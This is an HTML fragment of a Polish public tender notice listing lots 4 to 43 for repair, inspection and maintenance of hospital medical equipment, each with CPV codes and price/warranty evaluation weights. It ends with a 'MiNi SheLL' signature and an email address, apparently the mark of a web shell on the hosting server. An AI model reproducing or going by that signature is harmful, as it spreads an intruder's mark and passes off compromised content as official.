<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa aparatów EMG, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - Naprawa myjek ultradźwiękowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa myjek ultradźwiękowych, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 - Naprawa aparatów EKG i EKG ze spirometrem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa aparatów EKG i EKG ze spirometrem, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - Naprawa aparatu RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa aparatu RTG, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 - Naprawa defibrylatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa defibrylatorów, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9 - Naprawa ogrzewaczy pacjenta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa ogrzewaczy pacjenta, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10 - Naprawa podgrzewaczy płynów infuzyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa podgrzewaczy płynów infuzyjnych, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11 - Naprawa diatermii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa diatermii, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12 - Naprawa generatora do ablacji prądem RF.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa generatora do ablacji prądem RF, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie 13 - Naprawa kapnometrów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa kapnometrów, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie 14 - Naprawa pił.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa pił, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie 15 - Naprawa pomp infuzyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa pomp infuzyjnych, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie 16 - Naprawa rejestratorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa rejestratorów, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie 17 - Naprawa łóżek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa łóżek, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie 18 - Naprawa mikroskopów operacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa mikroskopów operacyjnych, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie 19 - Naprawa modułów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa modułów, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie 20 - Naprawa aparatów RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa aparatów RTG, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie 21 - Naprawa aparatu EKG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa aparatu EKG, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie 22 - Naprawa łóżka kąpielowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa łóżka kąpielowego, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie 23 - Naprawa aparatu RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa aparatu RTG, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie 24 - Naprawa stołów Trumpf.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa stołów Trumpf, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie 25 - Naprawa pomp infuzyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa pomp infuzyjnych, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie 26 - Naprawa diatermii Erbe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa diatermii Erbe, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie 27 - Naprawa aparatu RTG Ziehm.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawa aparatu RTG Ziehm, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na części wymienione w aparaturze medycznej objętą umową - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie 28 - Przegląd aparatów do znieczulania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd aparatów do znieczulania, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zadanie 29 - Przegląd analizatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd analizatorów, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zadanie 30 - Przegląd aparatów do krioterapii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd aparatów do krioterapii, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zadanie 31 - Przegląd aparatu do termoalblacji wątroby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd aparatu do termoalblacji wątroby, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Zadanie 32 - Przegląd aparatów EMG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd aparatów EMG, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Zadanie 33 - Przegląd aspiratora CUSA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd aspiratora CUSA, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Zadanie 34 - Przegląd audiometru.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd audiometru, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Zadanie 35 - Przegląd bieżni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd bieżni, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Zadanie 36 - Przegląd Kerrisona pneumatycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd Kerrisona pneumatycznego, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Zadanie 37 - Przegląd aparatu RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd aparatu RTG, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Zadanie 38 - Przegląd diatermii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd diatermii, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Zadanie 39 - Przegląd generatora do ablacji prądem RF.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd generatora do ablacji prądem RF, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Zadanie 40 - Przegląd aparatów RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd aparatów RTG, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Zadanie 41 - Przegląd aparatu RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd aparatu RTG, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Zadanie 42 - Przegląd aparatu RTG Ziehm.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd aparatu RTG Ziehm, 1 część, 1 pozycja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na czynności przeglądowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Zadanie 43 - Konserwacja respiratorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja respiratorów, 1 część, 24 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji na robociznę - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com